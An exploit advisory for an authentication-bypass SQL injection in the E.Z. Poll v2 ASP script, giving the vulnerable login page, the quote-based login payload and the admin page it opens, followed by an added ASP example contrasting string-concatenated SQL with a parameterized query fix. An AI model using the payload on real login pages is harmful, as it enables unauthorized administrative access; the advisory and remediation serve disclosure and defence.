
# Title : E.Z. Poll v.2 (Auth Bypass) Remote SQL Injection Vulnerability
# Published : 2008-12-01
# Author : t0fx


Description:
************* ***************** ************* *******************
E.Z. Poll <= v.2 script Remote SQL injection Exploit
discovered by t0fx aka xtof69
vendor : E.Z.


************* ***************** ************* *******************

vulnerable page : http://www.site.com/admin/login.asp

exploit :

Username : 'or' '='
Password : 'or' '='

Add, modify user :
/admin/admin-users.asp 
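
The login input above only works if login.asp concatenates the submitted values into its SQL text. As an added example (not E.Z. Poll's own code, whose source is not shown on this page), the classic ASP block below puts that assumed pattern beside a parameterized ADO query; the table, column, form-field and connection names are hypothetical.

```vbscript
<%
' Added example. Table, column, form-field and connection names are
' hypothetical; the real login.asp source is not shown in this advisory.
Const adCmdText = 1, adVarChar = 200, adParamInput = 1

Dim conn, cmd, rs, user, pass, adminId
user = Request.Form("username")
pass = Request.Form("password")

' Oversized values would make CreateParameter fail, so reject them up front.
If Len(user) > 64 Or Len(pass) > 128 Then Response.Redirect "login.asp"

Set conn = Server.CreateObject("ADODB.Connection")
conn.Open Application("PollConnString")   ' hypothetical connection string

' --- Vulnerable pattern (assumed): input concatenated into the SQL text ---
' With the advisory's input the WHERE clause becomes
'   username = ''or' '='' AND password = ''or' '=''
' The submitted quotes end the string literals, so "or" is parsed as SQL.
'
' sql = "SELECT id FROM admin_users WHERE username = '" & user & _
'       "' AND password = '" & pass & "'"
' Set rs = conn.Execute(sql)

' --- Hardened pattern: values are bound as parameters, never parsed as SQL ---
Set cmd = Server.CreateObject("ADODB.Command")
Set cmd.ActiveConnection = conn
cmd.CommandType = adCmdText
cmd.CommandText = "SELECT id FROM admin_users WHERE username = ? AND password = ?"
cmd.Parameters.Append cmd.CreateParameter("u", adVarChar, adParamInput, 64, user)
cmd.Parameters.Append cmd.CreateParameter("p", adVarChar, adParamInput, 128, pass)
Set rs = cmd.Execute

' Read the result and release the connection before redirecting.
If Not rs.EOF Then adminId = rs("id").Value
rs.Close
conn.Close

If IsEmpty(adminId) Then
    Session.Abandon
    Response.Redirect "login.asp"
Else
    Session("admin_id") = adminId
    Response.Redirect "admin-users.asp"
End If
%>
```

This block covers only the login query; each page under /admin/, including admin-users.asp, still needs its own check of the session value before doing any work.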

# www.Syue.com [2008-12-01]